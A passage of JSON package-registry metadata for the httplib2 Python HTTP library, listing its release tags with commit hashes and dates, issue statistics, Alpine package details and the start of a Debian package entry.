name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T16:25:00.868Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.19","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":282,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2024-08-20T07:11:23.183Z","updated_at":"2024-08-20T07:11:23.183Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.19","url":"https://pkgs.alpinelinux.org/packages?branch=v3.19","ecosystem":"alpine","default":false,"packages_count":23031,"maintainers_count":392,"namespaces_count":2,"keywords_count":3176,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":960},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-12-20T09:51:56.346Z","updated_at":"2026-08-25T05:07:15.581Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/namespaces"}},{"id":13527109,"name":"python-httplib2","ecosystem":"debian","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-10T22:55:01.679Z","latest_release_published_at":"2026-02-10T22:55:01.679Z","latest_release_number":"0.18.1-3","last_synced_at":"2026-03-13T08:28:37.507Z","created_at":"2026-02-10T22:55:01.497Z","updated_at":"2026-08-21T14:22:35.691Z","registry_url":"https://tracker.debian.org/pkg/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":"https://packages.debian.org/bullseye/python-httplib2","metadata":{"component":"main","architecture":"all","priority":"source","binary":"python3-httplib2","standards_version":"4.5.1","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"ca-certificates, debhelper-compat (= 12), dh-python, python3-all, python3-mock, python3-pytest, python3-pytest-timeout, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by 